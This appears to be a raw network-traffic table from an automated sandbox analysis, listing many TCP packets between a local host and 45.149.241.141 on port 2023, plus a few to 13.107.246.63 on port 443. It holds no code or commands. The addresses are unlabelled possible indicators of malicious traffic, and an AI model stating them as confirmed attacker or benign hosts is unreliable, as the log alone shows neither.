                                                                                                              Dec 5, 2024 10:39:27.082926035 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.084391117 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.084425926 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.084660053 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.085633993 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.085894108 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.086015940 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.087486982 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.087523937 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.087546110 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.091588020 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.116600037 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.117505074 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.124989033 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.125674009 CET49908443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.125689030 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.126275063 CET49908443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.126281977 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.197520018 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.197633028 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.197701931 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.198189974 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.198345900 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.198518991 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.199477911 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.199598074 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.199697971 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.200794935 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.200870991 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.201175928 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.202133894 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.202169895 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.202249050 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.203392029 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.203465939 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.203551054 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.204691887 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.204797029 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.204847097 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.205871105 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.205981016 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.206103086 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.207176924 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.207237959 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.207339048 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.208455086 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.208723068 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.208926916 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.209626913 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.209683895 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.209820032 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.210854053 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.211106062 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.211532116 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.212249994 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.212354898 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.212455988 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.213298082 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.213466883 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.213572979 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.214654922 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.214694023 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.214858055 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.216111898 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.216262102 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.216516018 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.217144012 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.217184067 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.217400074 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.218153954 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.218280077 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.218719006 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.219383001 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.219446898 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.219579935 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.220654011 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.220829964 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.220984936 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.221868992 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.221914053 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.221992016 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.223306894 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.223584890 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.223983049 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.224453926 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.224579096 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.225418091 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.225828886 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.225955009 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.226066113 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.227449894 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.227582932 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.227660894 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.228743076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.228832006 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.229070902 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.229825020 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.229948997 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.230510950 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.230756998 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.230920076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.231523991 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.231842041 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.231940985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.233163118 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.233253956 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.233283997 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.234311104 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.234323025 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.235188961 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.235228062 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.235238075 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.236576080 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.236614943 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.236666918 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.236939907 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.237570047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.237670898 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.237914085 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.238955975 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.238974094 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.239125013 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.239998102 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.240103960 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.240222931 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.241230011 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.241331100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.241563082 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.242423058 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.242532015 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.242660999 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.243674040 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.243788004 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.243912935 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.244905949 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.244925976 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.244990110 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.246067047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.246171951 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.246294975 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.247282028 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.247344971 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.247525930 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.248512983 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.248652935 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.249056101 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.249699116 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.249847889 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.250108004 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.250952959 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.251058102 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.251610041 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.252182961 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.252255917 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.252376080 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.253421068 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.253552914 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.254568100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.254702091 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.254702091 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.254878044 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.255836964 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.255886078 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.255945921 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.256983042 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.257119894 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.257514000 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.257668018 CET4434991313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.258188963 CET49913443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.258219957 CET4434991313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.258229971 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.258378029 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.258433104 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.258938074 CET49913443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.258944035 CET4434991313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.259433031 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.259558916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.259604931 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.260775089 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.260824919 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.260902882 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.261970997 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.316715002 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.389636993 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.389698029 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.389802933 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.389878988 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.390063047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.390296936 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.391037941 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.391372919 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.391561985 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.392254114 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.392326117 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.392421007 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.393352985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.393445969 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.393599987 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.394464970 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.394676924 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.394750118 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.395592928 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.395692110 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.395930052 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.396810055 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.396876097 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.397073030 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.397983074 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.398060083 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.398377895 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.399050951 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.399146080 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.399215937 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.400252104 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.400283098 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.401335001 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.401427031 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.401463985 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.402462959 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.402518034 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.402574062 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.403712988 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.403745890 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.403786898 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.404748917 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.404793978 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.404850960 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.405965090 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.406002998 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.406039000 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.407134056 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.407149076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.407171011 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.407572985 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.408226967 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.408335924 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.409377098 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.409404993 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.409483910 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.410490036 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.410563946 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.410593987 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.411547899 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.411633968 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.411724091 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.412785053 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.412816048 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.412941933 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.413929939 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.413992882 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.414017916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.415066957 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.415101051 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.415220022 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.415560961 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.416213989 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.416362047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.417356968 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.417443037 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.417507887 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.418596983 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.418629885 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.418659925 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.419549942 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.419847965 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.419862986 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.421159029 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.421174049 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.421231985 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.421953917 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.421988010 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.421988010 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.423140049 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.423255920 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.423283100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.423563004 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.424401999 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.424537897 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.425319910 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.425370932 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.425452948 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.426496983 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.426552057 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.426584005 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.427602053 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.427674055 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.427742004 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.427992105 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.428836107 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.428980112 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.429174900 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.429738045 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.429851055 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.429932117 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.430145979 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.430315971 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.431086063 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.431211948 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.431561947 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.432277918 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.432467937 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.432926893 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.433480024 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.433604956 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.433777094 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.434555054 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.434724092 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.435383081 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.435647011 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.435672998 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.435946941 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.436073065 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.436791897 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.436830044 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.437921047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.437966108 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.438045025 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.438456059 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.439169884 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.439214945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.439261913 CET499122023192.168.2.645.149.241.141
